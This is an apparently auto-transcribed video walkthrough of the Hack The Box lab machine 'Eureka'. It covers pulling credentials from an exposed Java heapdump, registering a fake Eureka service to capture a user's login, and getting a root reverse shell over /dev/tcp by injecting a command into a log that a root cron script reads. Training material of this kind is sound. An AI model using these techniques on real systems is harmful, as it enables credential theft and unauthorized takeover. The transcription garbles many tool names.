Hi, this is Olajide from CTF Security and welcome to another exciting video on the Hackthebox series. Today, we're going to be hacking a new Hackthebox machine called Eureka. And as usual, we're going to be approaching this from a beginner perspective, which means we're going to assume that we have no previous knowledge about the vulnerability that exists on this machine. So without further ado, let's get started. Alright, welcome back to the channel. Now, the very first thing we're going to do is to grab our IP address. So I'm going to take this and we're going to impute it into our browser. And you can see we get this site can't be reached. So I guess the reason why we're getting this error is because I have not properly configured my browser to proxy through Bob Suite because I have the Bob Suite opened. So I'm going to go to Foxy Proxy and I'm going to set it to Bob. And when we refresh, so let's paste the IP address again. Okay, so let's go to Bob. And when we go to target, proxy, history, you can see that a request is trying to go to funny.htb here. But our Bob Suite is not able to redirect us to that location because we have not properly set up our host file. So what we're going to do is let's go with sublime sc/host file, and we're able to modify our host file to point us to that specific domain. So let's grab it from here. I'm going to insert it here and we're going to save. And now when we refresh, everything should be fine. So let's just close this. Let's paste the IP address again, or the domain name, I beg your pardon. And you can see that this is actually coming up. And it looks like a furniture web application. And when you scroll down here, you can see different types of furniture, including their prices. You can see some home messages here. We get why choose us, some information about the company. When you scroll down, you can also see some recent blogs from the company. And when you hover over them, you can see where they are pointing us to. At the bottom left corner of the screen, you can also scroll all the way down to access the social media handles, and you can see this is all redirecting us to the same page. Now, before we start anything on this application, the very first thing I'm going to do is to start Nmap scan so that we can see all the services that are running on the application. So let's do that first. I'm going to go into my Hackthebox directory and let's try to create a directory called Eureka. And what we're going to do next is Nmap. So I'm going to scan the funny.htb, which is what we are actually working on right now. And we're using script scan as well as we're using version scan here, which is going to tell us the different versions of open services on the application. So we're going to give that a few minutes to load. So while that is going on, let's go back to our application and we can try to access the page source for this application. And you can see that we have a lot of comments. We also have, let me see, I think I saw something. Bootstrap 5, we have the template being used, which is the funny template. We have some HTML docs, columns, sections. This is just basic HTML. You can see the blog post where they are leading us to. You can as well try to access each of these links to see where it is directing us to. You can see the different menus, the about, the services, the blogs, and the contact. So we can try to actually click around and see what we have on the contact. So this is just where we can send information to the admin of the application. We have register, where we can register an account. What else do we have? We have the cards here. You can try some basic brute forcing here, but I don't think we'll be able to gain access here. Bad credentials. So we could brute force here, we could try SQL injection or any other kind of attack vector. But I'm just going to wait for our scan before we proceed on any attack on this interface here. So you can also visit the shop. This is just listing different types of chair, including their prices. So what do we have on, I think I've accessed this. Okay, services. Let's see what we have on services. So nothing much. Okay, so let's see the progress of our scan. You can see it, our Nmap scan is done, and it happens that we have just 2 ports open. We have the port 22 for SSH, and we have port 80, which is running HTTP service Nginx 1.18.0. So there's not really much port open on this application. So what we can do is to just grab this for reference purpose. So I'm going to grab this and let's go to our documentation. So we're going to put this down and call it Nmap scan. All right, great. So another kind of scan that we can perform on this application is we can try to see the technologies that are running using the Wapalizer. And there's not really much here. We just have the Nginx web server. We have some JavaScript library like the tiny slider, and we have the font script. So we could probably perform a nuclear search, which is a vulnerability scanner that could go into the application, perform some tests, and be able to give us some attack vectors within the application, if any exist. So what we can do is we can use, let's clear this one, Nuclei. Let me first of all change directory to Eureka, which is the directory I just created. So we can use the Nuclei. We can use the -u for user, and we can specify our URL, which is the target URL, which is the funny.htb. And let's try to run this and see what we get. So I'm currently running the Nuclei v3.4.4, which is the version 3.4. And this is going to perform some scan using different Nuclei template. I think about 7,000 Nuclei template also for the current version. But it happens that my own Nuclei version right now is outdated. You can see it here, 3.4.4. Which is great. We have new templates added in the latest release. So this is about 105 new templates added for this specific version. And now we're now having template loaded for current scan 8,000. So previously it was around 7,900 and something. So now we have about 8,000 template that is going to be tested against our target machine. So here it says executing 7,885 signed templates from project discovery / Nuclei templates. These are the developer of this vulnerability scanner. We have one target loaded, which is the funny.htb template cluster, about 1,747. And then This is just telling us our current version. So our scan has started already. You can see that we've detected some WAF, which happens to be the Nginx generic, but I'm just going to ignore that. But here you can see that we have something called critical, and right here we have a specific endpoint here, which is the http funny.htb actuator / heapdump. Now what I'm going to do is, let's try to see what this is. I'm going to copy this, and we can just do a very simple basic search of what Heapdump is. So this is more from Gemini AI, and it says a heap dump is a snapshot of Java virtual machine, JVM, heap memory at a specific point in time, capturing all the live objects being used by running Java application. So this is giving us a hint that we are dealing with Java application here. And we also have another definition. So I guess this was extracted from this post here, which says a heap dump is a snapshot of all the objects in Java virtual machine, heap at a certain point in time. So in case you didn't get what we're trying to say here, a heap dump is like a full body scan of a Java running application memory at a specific point. Now, this heap dump usually contains things like objects, which could include variables, classes, strings, or different kind of objects that are stored in the memory. It could also include their sizes in the memory. Now, what we're going to do, since we know that we have a specific endpoint for this heap dump file, is we're going to try to download this heap dump file, and we're going to test or analyze this heap dump file to see if we can extract sensitive information like credentials that can help us to gain access to this funny.htb machine. So what we're going to do right now is, let's go back to what we have here. So you can see that we have a lot of HTTP missing security headers and all. So we're just going to ignore all those cross-origin resource policy issues here and focus on this specific critical one here. So let's grab this. I'm going to copy this and let's try to document that first. And we're going to say scan, and here we're able to get this specific endpoint here. But when we take this endpoint to our browser and try to access it, let's see what we get. So you just keep rolling and rolling and rolling. So what I'm thinking is probably the size of this application is kind of big. So what we're going to do is to try to use some other tool like the call to download this particular file. So what we're going to do is open, or let's just use this existing terminal. So we're going to use call, or rather let's use wget. Sorry about that. And we're going to paste this particular URL. And this is going to download the file. And you can see that our download has started. So we are just at 1% here. So we'll just give this some few seconds to probably finish this download and see how we can analyze the file. Now, there are different ways we can actually analyze this heap dump file. Most of the time, it comes as just heap dumps. Sometimes it might come with an extension, which is the hprof also. So what we're going to do is either try to use the string command in Linux to try to filter through the heap dump file to see if there are hidden passwords or configuration files or whatever information that can help us in actually bypassing the authentication system on this machine. Or Alternatively, what we can do is to use a tool called the Eclipse Memory Analyzer tool. So we're going to import this Heapdump file into that tool and try to use that tool to analyze and look for hidden credentials within the application. So we have 64% already gone. So I think we have less than a minute for this Heapdump file to fully download. So I'll just grab a cup of coffee and I'll be back. All right, great. So you can see that our file have successfully downloaded. I can do list and we see our Heapdump file. We could also run file Heapdump to see what kind of file it is. So you can see that this is Heapdump, Java hprof dump, and it was created on Thursday, August 1st at 6:29 p.m. 2024. So what we can do is to use tools like strings to access Heapdump. So let's just take a look at how it could be. So you can see we have a lot on this file. So let me just clear it. So what I'm going to do is we're going to use the memory analyzer tool, which is the Eclipse tool for this Heapdump file. So let's open a new tab for that. I'm going to increase the font. Let's go to my opt directory and let's see what we have. We have the MAT. So you can see it here, CD MAT. We have our memory analyzer. We just open up that. And this is going to launch the GUI of the memory analyzer tool. So this is very simple to use, by the way, for this purpose. So we could also have a complicated way of using this tool for garbage collector and memory leak and stuff like that. But we're just going to be focusing on how we can extract hidden credentials from this Heapdump file. So it says the following snapshot do not exist anymore. They will be deleted from this. So let's just, okay. We're going to open a new workspace and we're going to import our file into the memory analyzer tool. And when we try to access the HTB folder inside the Eureka, you can see that we can no longer find the Heapdump file which we downloaded recently. So what I'm going to do to fix that problem would be, let's see, to rename Heapdump to heapdump.hprof, which is the original format that is recognizable by the Eclipse MAT. So I think I made a mistake here. We're supposed to have P. Okay, great. Still another issue. Okay, great. I think we'll fix that issue. And we have our heapdump.hprof. So let's go into the Eclipse Memory Analyzer and try to access that again. And you can see that we now have our tool, about 80 MB. I'm going to open. So this is currently loading our Heapdump file into the memory analyzer. And it's going to give us some options for our analysis and reporting. And we just wait for a second. Okay, great. So we have three options that we can perform here. We have the leak suspect report, which automatically check the Heapdump for leak suspect. it reports what objects are kept alive and why they are not garbage collected. We also have other options like the component report, and we have the reopen previous run report. So we're going to be sticking with the first option here, and I'm going to click on finish. And here we can see that our memory analyzer has successfully loaded the heap dump file. We can also see a pie chart of the leaks here. So you could see, can I expand this a bit? You could see the sections where we have leaks here. We can see we have the section A 7.5, section B 4.7, section C, which is the 3.6. So we could also use the different menu we have here, like the histogram. We have the open dominator tree for the application. So this is more like different ways that we can view our heap dump files on this memory analyzer. But what we're going to be sticking with today is to run a query. So let's see, where do we have that? Okay, so it's called object query language here. And the way we're going to be using this is actually very, very simple. So what we're going to be doing is, before we run our query, let's try to see, let's go to the dominator tree. And from the dominator tree, when you access each of these files or objects that we have here, you can see that we have shallow heap and we have retained heap, which is about 752 MB here. And when you access each of them, you can see that they have sub-objects within them here. You can see them, which you can access them, and there are different memory sizes, including the shallow heaps and the retained heaps. So, but the query we're going to be using is for java.language.string. So that is what we're going to be using to find the different credentials from this heap dump file. So we're going to go to the query section here, and we're going to use select s from java.lang.string s where to string. So let's have this in brackets, dot to lower, which is a method for lowercase. So let's say lowercase. Then we can use contain. So what do we want to search for? Contain, let's say possibly password. So let's close this. And let's close the bracket, and I'm going to copy this in case it fails. So to run, I'm going to just hold Control and press the Enter key. And so I think we have issue here, which is my closing quotation, and we're going to run that again. So it's currently running the query. And you can see that this query is very similar to SQL query, just that you have to know the object you are selecting and stuff like that. So this is what the Java language string is able to extract using the regex. And you can see that what it did is to extract a different section of the heap dump file that contain the word password. So it doesn't care if it is lowercase p or capital letter because of the to lowercase we actually included in our query. So you can see it, password is included here. That is why we have this outputted on the screen. We also have password converter. So let's just click through to see if we have any important credential here. Okay, so there's nothing really much here. So what we can try to do is to try to modify. So sometimes credentials are usually written probably like this. So let's say we might be having something like password equals to this, or we might even be having password like this, then the value here, then value. We could also be having things like usernames or other configuration files. So let's go back into the memory analyzer, and we're just going to tweak this value here a bit. So let's use column first, and we're going to run, hold down Control and click the Enter key. And this is going to try to search for that particular keyword within the Heapdump file. Okay, so we have issue. Your query did not yield any result. So let's use equals to rather, and let's run. Okay, so this time we have just 2 results. So our first entry is this. Let me just increase this a bit. So our first entry is this JDBC MySQL localhost on 3306, which is the port for MySQL /funny web app db.password equals to this. So this is more of like an important information which is containing the password of a user and even including the username. So I will just copy that. So click on it, right click, go to copy. I'm going to copy value, and we're going to include this. So let's just do away with this one. And this is going to be called Heapdump Memory Analysis. So what we found was this credential, and I'm going to just mark out the password, and I'm also going to mark out the username. All right, nice. So let's go back and see if we have any other information in the second entry. So if you go to the second entry, we just have an SQL statement, I guess, or something like an SQL statement which says update user set email. Value for the email is supposed to go here. First name is supposed to go here. Last name, password, and the ID. So there's no really any credential on this second section here. So in database files, we usually also have a different way of specifying passwords, just like I indicated the other time. So we could also have passwords that are written this way. So instead of saying password equals to this, you could also say password equals to this, or you could say PWD or something like this. So there are different ways we can represent our password here. So I'm going to try to search for this format here, if we can have any other important credential. So let's put it in here, and let's search again and see what we're going to get. Okay, so we get 8 entries, and let's try to access these entries. So this looks like a base 64, another encryption. These are all encryptions. Okay. I think this is more of like another endpoint, including server information and the password. So what I'm going to do is I'm going to grab this also, right click, copy value, and let's go back here We're going to paste it down here. So as usual, I'm going to edit. And let's mark this as the password. And this is the server. Okay, Eureka server. All right, nice. So I'm going to do away with this one. So I guess this is all the information that we could get here. You can do further analysis on the file, like modifying whatever we have here. Like we can actually modify the value, probably use some username or any credentials that we want to find on the Heapdump file. So for now, I'm going to just close out this. You could also do this using string, just like I pointed out earlier. So let's say we don't have memory analyzer. So how can we use strings to actually extract this information here? So let's say ls, not here. So let's clear screen. We can say strings heapdump dot hprof, which is what we've renamed it to, and we can grab things like let's use ignore case to grab anything that ends or that starts with password or that has password in it. So let's see, remember we used equals to, and you can see that we've successfully extracted the password. We could also use pwd it might need us to add some wildcards there. Can we use it the way, let's say, could try HTTP. Oh, we'll have a lot of HTTP, so that would be very, very hard to use that. What else can we use? I want to use something like this. Okay, so there are different ways we can, you just have to know what value you are going to use for your extraction here. So the key into finding important information is actually how you can tweak your grep when you pipe it along with the string command here. So this is how you can actually extract credential from the Heapdump file. So now that we've gotten some credentials, let's try to log in with that credential. So without wasting much of our time, what I'm going to do is, so let's just go back home and let's use SSH. So what's the name of the user? So the user we got was Oscar190, and this happens to be the password. So let me grab the password. SSH Oscar 190 at funny.htb, which is the host name or the domain name. And when asked for password, we're going to supply Oscar's password. Okay, so we are logged into Oscar account. Now we can start some enumeration, and you can see there's nothing on Oscar's desktop. So I'm guessing there's still another account that has more privilege than Oscar on the system aside from the root, for the fact that we do not have the user.txt on the Oscar's home directory. So we have, let me just make this bigger. We have the .mysql_history redirected to dev/null. We also have the bash history redirected to dev/null. So now boil down to what can we do on this machine. So we can try to find out all the users. We can do cat/etc/password. What we need to do is to look for users that are above 1000 or 1000 and above. So Oscar right here is 1000. So you can see Oscar UID. And we also have another user called Miranda Wise, which is 1001. And I don't think we have any other user above 1000 aside from Oscar and Miranda Wise. So what we need to do now is to look for how can we escalate our privilege into Miranda Wise. Now, if you look at the credential that we retrieve here, you can see that this particular domain here, this HTTP protocol here, has this server information here, including the password at localhost. So probably we have some services running or interacting locally within the system. So we can try to view the network statistic of the server. So let's try to do that here. We can have net stats, and we can use the TULNP. Did I get that correctly? Yes, I think I do. So we have some ports that are listening. For example, you can see that this particular port 3306 here on localhost is actually listening here. You can see it here. We also have any IP address on port 80. We have 53. I'm guessing this is some kind of DNS. So this is port 22 on any IP address, which is SSH. We have another one on port 8080, which is only accessible locally here because this is on localhost. What else do we have? We have 8081, 8082. We have 8761. So there's a lot of port here. We can try to access all of them. So what we need to do is to bind this port to our attacker machine, and a simple way to do that is to use SSH. So let's try to, where's my other terminal? Did I close it? Okay, so this is the one I used to log in. So let's use this one. So what we can do is we can have SSH-L. So I think I have a way of doing that. Let me just see for a moment. I think that should be on SSH. So it's actually called port forwarding. And what we're trying to do is, for example, here, we want to bind our own attacker machine on port 9000 to any port address that we inserted here. So if the system is listening on, let's say 3306 on the local host, we can bind it to 9000 our own attacker machine. So if we go to our own browser and enter localhost/9000, we'll be able to access the same application that our target system is running on this specific port here. So what we're going to do is I'm going to grab this template, and in order not to waste our time. Okay, yeah, great. So let's go back here and let's bring back our SSH. Good. So what we can do is we can start replacing the ports. So the first one here is on, let's start with 33. So let's just ignore that particular one. Let's start with ports. These are just essential ports. We didn't want to use the SSH. We don't want to use 80. Let's start with 8081 or 8080 rather. So let's bind this one to 8080. So 901, I'm going to bind it to, I think we have 8081. Good. So okay, that's for 901. 902, I'm going to bind it to 8082. Good. And what do I bind my 9032 to? Do we have any serial one? Okay, so we have another one on 8761. So we can actually use this instead of using 903. Yeah, we can actually do that. So let's try to bind this one to 8761. So we can bind it to the same number. Eight, 7, 6, 1. What else? Do we have any other important ports that is listening? I think that is just the big deal. So I can decide to bind this one. So let's use, instead of 3306, I can bind it to 3307. Then the last one, is there any ports? 80. Okay, let's just bind the 80 as well. 81. Sorry, it should be 80. And this should be 81. Great. So let's just copy this in case we need to reference it. And let's go back to our documentation. So we're going to call this port forwarding. So this is the port forwarding we did. And let's try to authenticate. Let's grab our credential, which is Oscar's password. Okay, so we've successfully binded all the ports. And now if we go to our machine, so let's see the ports that we binded. First, we binded 9000 to 8080. So if we want to access this 8080 on the server, we just go to our machine and access localhost on port 9000. So, and you can see it now. We have access to the internal structure of the web application. So let's see another port. We have 9001, which is for 8081. So let's see what service is running there. Just change this one to 1. Nothing much. Let's see 9002. That is running right there. Still the funny application. Let's go. So we binded this port. Remember from the credential we got, it's running on this particular port. So I guess this is going to be useful to us. So what I'm going to do is to grab what we binded the port to. Remember, we still binded it to the same port on the server. So we're going to paste that in here and try to access it. And you can see that it's asking for credential. So I'm going to enter the credential we extracted, which is this for the user. And we're going to use this as a password. So I think we're authenticated. And let me just click never. We have the Spring Eureka environment here. Instances currently registered with Eureka. We have the local host app gateway. We have the funny on 8082. We have the local host user management 8081. This sounds interesting, this particular instance. I think that is pretty much what we have. This is the IP address and our statue is up. So what we're going to do is try to access this particular user management service. So I don't think it is accessible. So what can we actually do right here? So if you go to, so let's call this Eureka GitHub. So I think they have a structure of how their path work within the GitHub repo. So let's see detailed documentation. Understanding Eureka 1.0, 2.0 is discontinued. Let's see how the REST operation works. So you can see that we can actually access this on V2, especially when we're dealing with REST API and stuff like that. So we can send a post request to eureka/apps/app ID. I guess this is going to be our instance name also. So we can also have delete method when we want to deregister an application instance here. We could also have query just to access them. So what we're going to do is we're going to go to this localhost 8761. And we're going to try to access the Eureka, just like it says on the GitHub documentation. And I'm going to take this and let's see if the path exists. So let's just delete this backward. And we need the slash. Okay, so let's do away with this. Oh, I think it worked. That just took us some time. Sorry. /apps. Okay, so I think it works. And we have some application here. So let's see the instances we have running. So this was the first one, which is the app gateway on 8080. We also have, do we have another instance? Okay, we have the user management service, which sounds kind of interesting. Eureka user management service. Okay, so it says Eureka is a service discovery server and client developed by Netflix, primarily used in AWS for locating service to enable load balancing and failover in microservice architecture. A user management service can leverage Eureka to register and discover instances of itself and other services within the micro ecosystem. So what this is trying to say is that the user management service performs a central role for itself and other services. And it can also, just addition, let me just add this, this particular user management service can also store information like user credential, tokens, P2 informations. So we need to treat this user management service carefully, and that is what we're going to be exploiting today. Our attack flow is going to be this. So what we're going to try to do is, since we know that this particular user management service can be used to register new microservice, so what we're going to do is we're going to create a new microservice to mimic this user management service. And instead of actually using the address of the server, we're going to be using our own attacker IP address in here. Other information is going to remain the same. And then we're going to see how we can redirect traffic. So when this particular microservice make request, it redirects the request into our own fake microservice, which is going to then redirect it to our local machine. So we're going to use that method to extract the credential of a specific user that is tied to that microservice. So let's see how we can do that. So we're going to use call to do that. And before we actually move into that, I'm going to try to grab everything we have here, I think to this point. So let's just copy this, and I'm going to open a new tab. So first of all, we need call. We need to send a post request, and to what, let me just copy it direct from our documentation. So this is where we are sending our post request to create a service. Okay, great. So the next thing we need to do is we need to specify, let's just remove this one. So we need to specify some headers, and let's try to go with first, we want to use content type, and so I'm going to grab the content type later, And we want to also add things like data. So for the content type, let's add this first. Let's see some of the requests. Now we made. Does it have content type? Okay, so since my server is not capturing localhost, my Bob Suite, I beg your pardon, is not capturing localhost. So what we can do is try to refresh this page. And let's see header that we have. So this is XML. So I'm going to be using JSON to send my data. /JSON. Okay, great. So we want to send data. Okay, so this is our first curly brace, and let's try to see data that we're sending. Instance, we're going to remove the angle brackets, and so as instance is going to be this. I think there's a column here. Then the other section is going to specify the name. So this one is instance ID. We're going to use this just as the name of the instance. So I think that's that for this one. So for host name, our host name is going to be our IP address. So let's quickly add that. 10.10.14.122. So you can see my host name right here. So we also need the app. Right now the app name is user management service. We're going to leave that the way it is. I don't think we have any issue with that. So we also have IP address. This is also going to be the same thing. As the IP address of our attacker. Let's close the quote. So we have, do we need status up? Great. So okay, status is going to be up. I don't think this one is necessary. I'm going to do away with that. We also have port. So what can we do? Okay, so we can specify port. And then since we're going to be passing it using bash, so we can say the dollar symbol, and let's stick with the same port, which is the 8081. So we're going to take this, copy, okay, great. So the next thing we want to add is, we need secure port. No, since we're just creating a fake microservice. Country ID, I'm going to do away with that. Instead, let me just go back. As a secure port, duration, timestamp. We only have secure port, we don't have secure IP address, which is one of the essential values we can add. So let's try to add that. So let's go and say, first of all, we want to add secure VIP address, and we want to bind this to user. Let's just copy it. Okay, so I think that has been done. We also need VIP address. Just some essential parameters that we need to set. So let's take the data center now. data center info. So we can use, so this is more of like another curly brace. I'm just going to insert still with the class. So we have Netflix com.netflix.appinfo.instance. I think info $default data center info. I think that information is correct. Okay, so how can we insert this here? Okay. So let's try to use hotels. Do we have any other service here? Aside from the data center info, we also have name. So my own. So I think this is more like the basic thing. So let's go to this AI and say, okay, format this properly and add tag to proxy the call through Bob. So we want to be able to capture the request that the call is going to be sending to the server through our Bob suite. So I think this has properly formatted it. But remember, we're going to change the IP address. So here we have our IP address to be 10.10.66. Is that what I put in there? That is wrong. So we're supposed to maintain the same address. So let me just leave this one. And we're going to make that modification to this one. Okay. So let's make that let's make that modification here. Good. Now, before we run this command, remember we are trying to create a fake microservice with the name of this user management service that is already existing. So the very first thing is, remember we are using port 8081. Now we want to proxy the whole credential that is going to be retrieved from the machine to this particular IP, which is our own attacker machine IP. So what I'm going to do before running this command would be to open the netcards on port 8081, since that is the port we're using. So we're going to grab this. Let's confirm it added the proxy. Okay, yeah, so it added the proxy for the call. But this is strange. I think it's supposed to be X. That is a lowercase x. But we're going to try it anyway. So let's see. Did I copy the right one? Okay, good. Let's see where are we going to run it. I think we need to open a new tab. Let's take this to the right, and I'm going to increase the font. I'm going to make that request. Hopefully we get something. All right, so it says timestamp status 404 error. So probably we're missing something. Oh, okay. I think that is not supposed to be from my attacker machine because we're sending this locally. But since I have it already proxied, so let's see what I'm going to do. Sorry about that. Can we execute that? Here. We have an error message. Okay, timestamp is, can we try to debug that issue? The credential is correct, definitely. So says if you're unsure, try passing credential with you. No. We are certain that we're using the right one. Okay. So I'm just going to take a command I used earlier. So let's try to fetch that. Eureka. I think there was a command. Which is this one. So let's grab this one. And did I miss the endpoint before? Let's see the one we're using before. What's the endpoint? So now we're using local 127. Well, initially I just sent a request. Oh, okay. I think I messed that up. Okay, so nevertheless, we're going to use this new, and let's try to make sure that our IPs are correct. To grab this and replace it with this. Still make sure I'm using port 8080. So let's see. And let's see if anything is actually happening. So no request was sent because port suite is not capturing on localhost. But if everything go on as planned, we're expected to receive our credential here in less than 2 minutes. So I'm just going to wait for that. Okay, so we got our information back, and still yet there's no request from local. Let's see, do we have any on history? Let's see, is logger taking? Okay, so I think it did. Let's see. So this was the first one we proxied, and you can see the request we sent. Is there any other one? So this was the first one, and this is the second one here. So we got 204 here without any information on the response here. So this was a request that actually created the new or the fake user management service. And when we go back here, let's just reopen that here. You can see that we got new information. So I'm going to copy this. So let's go back to my documentation. Getting credential using fake microservice. Okay, or rather, instead of using it as a code, let's just paste it in here. So what I can do is I can copy it. Let's take it to decoder. So we can URL decode this. So let's copy it. And we're going to paste it down here. So now we know that the Miranda account is, the username is miranda.wise, and the password is this: I live to be and be to love. So I guess this is the password. We're going to try to SSH into Miranda Wise account right now, since we have a credential. So let's do SSH Miranda Wise at funny.htb, and for our credential, I'm going to paste that in here. So you can even see that we were able to extract, including the CSRF token right here. So in case you're needing it, I'm going to mark that out. I'm going to mark out the password. The and is not supposed to be there. I think that password authentication for the SSH is going to fail. Let's go back there. Yes, I thought as much. Copy, and let's validate. Great. And for the username, is going to be Miranda Wise. Okay, so let's go. What do we have? Let's take this Oscar accounts back here. Let's see. Now we have user.txt file on Miranda Wise account. And what else can we do? Can Miranda run sudo? Supply Miranda's password. So no, Miranda does not belong to the sudo list. What else can we do? What else can we do? We can try to see groups Miranda Wise. So what group does Miranda Wise belong to? So she belongs to Miranda Wise group and developers group, which is not really interesting. So what I'm going to do is, for now, let's just call this /h2. This is going to be privilege escalation. So let's go. I think I do have privilege escalation file. So what we can do, so we've actually run this already. We do not belong to sudo. We can try to find writable file. This doesn't sound interesting. So writable parts that are owned by root. Let's run this on Miranda's account. Lot of files. Okay, so you could also find different bash scripts. So this one is finding the entire bash script. These ones are bash scripts that are owned by root. You can see them, user equals to root, and the file ended with .sh, and we redirect error to dev/null. These particular ones are those files that are writable by current user, and the last one is those that are executable by current user. So let's try to just find different files that are owned by root. So now we're not just finding file, we're finding scripts. So it can be Python script, it can be bash script, whatever script that is owned by root that can give us privilege. So you can see that we have a lot of them. These are all bash scripts. You can see them, all these are found in the etc. But you can see there's this specific one called loganalyze.sh in the opt directory, which is strange. You can see the other ones, we have the /etc/usr. I think that is all we have. Then we have /snap. So let's try to see what is inside the /opt. Sorry, cd/opt ls. So we have about 2 directory with 1 file. Can we access cd heapdump? No, we don't have permission. So we can try to check permissions on this directory. So for the heapdump directory, we belong to this category here because we are neither root nor do we belong to the data group. So we belong to this category with no access at all to this particular directory. So as for the script, the same thing, we have no permission to access this file because we do not belong to root group and we are not root user. So, but for this particular script, which is log_analyze.sh, we do have executable permission because we are not root, we do not belong to the group root, but other user here has executable permission and read permission. So we can be able to view this particular log_analyze.sh, and at the same time, we can execute it. So let's try to see what it is. I'm going to use cat log_analyze. Sorry, that was a mistake. .sh. So this is the script. Oops. I'm going to copy the entire bash script. And we can take a look at it on a new tab here. So we have some variable declaration, the log file, the output file. So whatever this script is going to be outputted is going to be named log_analysis.txt. We also have some color here. We also have status codes, 200, 201, 302, different status code. Then we have some functions within this script. We have the analyze login function. We have the analyze HTTP status. We have analyze log errors. Now, what I'm going to do is take this script to, let's take it to ChatGPT, and I'm going to paste it and say, analyze each of the functions in this bash script so that we can get clearer understanding of what the script is doing. So the first function, which is the analyze login function, what does it do? The purpose is it analyzes successful and failed login attempt. It uses grep to find line containing login success logger and login failure logger. Then it extracts the username between single quotes using the awk-f print 2. Then for each found user, it increments a counter in 2 associative array. So that is much of what this one does. For the analyze HTTP status, it tracks how many times each HTTP status code, 200, 400, 500, appears in the log. It grep for the line HTTP status using this regex grep op status k, which to extract just the status code alone, and then it iterates through predefined status code array and increments the matching one here. So this is going to be the structure of the log line it passes. So we also have the last analyze _log _array. So what we're going to be focusing on, what is happening? So let's decline this. So what we're going to be focusing on, let's go back here, is this second function, which is analyze HTTP statuses. So let's go and see what it is saying. Okay, so we have some loop statements, some code declarations which echo lines and grab this particular status. And then, so what else we can do on this analyze HTTP response is, let's try to take this and do further analysis on that. Check the filtering for possible command injection. So it says this is the function here, which is what the code is running. You are reading each log line, extracting the HTTP status code, and we're grabbing for this particular value here. So this means to find anything after the status here, which could be unsafe if a malicious line contains maybe any code after it. So it can probably execute anything after the status here. This is just what it's trying to say. And we have, if the extracted code is used unsanitized in a var or execute command, you are in trouble. But in your current script, if existing underscore code is equals to code, the code is only compared numerically. There is no command injection ever backtick used. So currently, no direct command injection vulnerability. However, there's a logic flaw if code is not numeric. If the log contains status code or status code, then execute any command, the script will throw an error here, which is this. But we're not interested in that for now. We're going to be exploiting this in another different way. So what we're going to be doing is, let's see again. To run the script first, we need to do analyze.sh. Sorry about that. Analyze. Did I get it correctly? So we got error and it says log file not found. So we need to pass this along with the log file. So to do that, we need to find log file within the system. So we can use find slash, we can have a name. So let's call it any file that end with .log. We can also specify type, which is a file, and definitely we're going to be having errors. So we could redirect the errors into /dev/null. Oops, I don't think that was working. Something is wrong. I'm not supposed to be having. Am I having too many? Sorry about that. My bad. I think this is the issue. Good. So we have different files that end with .logs. And the one that probably interests me more is we have this var /web/cloud gateway /log/application log. And we have also this directory that also ends with application logs. So let me just grab that and we're going to add it to our documentation. So this is our log file, and we found a bash script as well called, I think, what's the name of the bash script? Log analyze.sh, I guess. Okay, so definitely we can run any of this log file against that particular bash script. So let's copy this directory. Cd that directory. And then cat application log. So this is what we have on the application log. I can do this to see the permission we have. So we can read this particular application data here. So what we're going to do is we're going to see if we can try to create our own. Since this is being passed into the script, we can use the /opt/log_analyze.sh. Then we can pass this file into it. And this is going to give us a result, and you can see it. We have successful login count 23, total successful logins, and we have the status HTTP. We have 201, 300, 72 info, Eureka connection failure count, which is 1, and we have our log analysis.txt generated. So this is how the log analyze.sh script works. Now, if you go to the script here, remember we have this log, we have this analyze HTTP status. So what we have here is, remember what we said, that this particular expression is meant to extract everything in the log file after this status here, and it's not doing that safely. So meaning that if we are able to control whatever is coming next after this status in the log file, we might be able to execute a command injection or RCE on this particular machine. And the reason why this is also possible is, if you check the display function as well, I think it uses this code because this is the vulnerable line. And when you check the display results, I think I have it somewhere here, where it expands the code variable. Yeah, I think this is it. So you can see it here. So it did expand the color with string interpolation along with the reset, the count, and the code before processing it with the printf. So this makes this code execute using command injection on the server. This is going to execute before it prints the f. So this is going to execute whatever command we have. What is it? Not here, not here. So it's going to execute whatever we have here. Remember, everything that executes here is going to be saved inside the code variable. And when the code variable executes at this particular function, which is the display result, our malicious code gets executed. So what we're going to be doing is trying to control the application log file. So let's see, can we actually go to Miranda Wise and let's see what we can do right here. I can try to remove rf log underscore analyze or analysis.text. Then I can also remove rf. So what's the name of the application log? Okay, great. So I can actually delete this particular application log. And when we do ls, you see that the application log is gone. But I guess this is running as a cron job, because when you leave this for some seconds or some minutes, you see that it runs and generates these application logs again. So what we're going to be doing is, first of all, craft our payload. Then we're going to check if the application log is back. If it is back, we're going to delete it before we execute our payload. So let's just open a new page here. So what we're going to be doing is, for what we're going to be inserting into the application log, we're going to be using echo. We're going to craft our HTTP status. Now remember that it's going to extract everything after this status, right? So we can then specify just X as the starting point. Then we can try to execute a bash command that says /bin/bash. It's going to be interactive, and /dev/tcp/ip/ we're going to use 444 as our port. What else? Okay, yeah, I think we have one more, and one. I think that should be pretty much everything. Remember, our IP is going to be 10.10.14.122. I think this is correct. Let's just verify. Yeah, so I think it is correct. And bin bash. Okay, so let's try it. First of all, let's open a new tab. And here we're going to open ncat or netcat rather on port BP 444. I hope that is coming up. Am I using 444 already? Sorry about that. Okay, so I think we're good. Let's check if our application log is back. So you can see it's back already. So let's quickly remove that again, rf. And we're going to go get our script. We're going to execute. So now when we say, oops, I think I made a mistake. I'm supposed to echo this to be our new application log ls, I think is present. Again, we're going to remove. So the cron job keep running. That is why we are having multiple application log. So let's do that again. We're going to echo this and we're going to redirect it and save it here inside application.log. Good. So now when we cut application.log, great. So all we have to do is wait for this to execute and see if we are going to get a shell right here. So this is going to take probably less than a minute or two. So we'll just give it some time. All right, so you can see it that our script has executed and we gain root shell. So we can try to stabilize this as usual. So I'm going to fire up my privilege escalation node. So let's see, you can see that this is not a standard TTY shell. So we can try to grab this. Okay, good. I'm going to put this in the background. Ctrl Z. And then we're going to set this stty raw-echo, and then we're going to set it to foreground again. Then we're going to reset. That's strange. Or let's call it specify the type. Okay, so let's try to just do the same thing. So let's try to remove that application log again, and then we're going to run our command, and hopefully we get a shell again in short time. We're still waiting for a shell. It's taking a while. So I don't think that's going to run because our cron job has already executed. So what I'm going to do again is remove the application log and run our payload again. Just verify it. Okay, good. So we wait. All right, so we've gained our shell. And once more, let's try to fix that shell issue. Wonder what the problem was. Let's paste that. And Control Z. Then I'm going to set this to foreground. And then we're going to execute our reset. I think this was the issue. This was the issue. So the reset was the issue. So you are seeing this because your terminal type is not set or recognized, possibly due to broken TTY or non-interactive shell. Set a valid terminal type manually when reset ask. So just type xterm. So let's see if that is going to fix the issue. Okay, 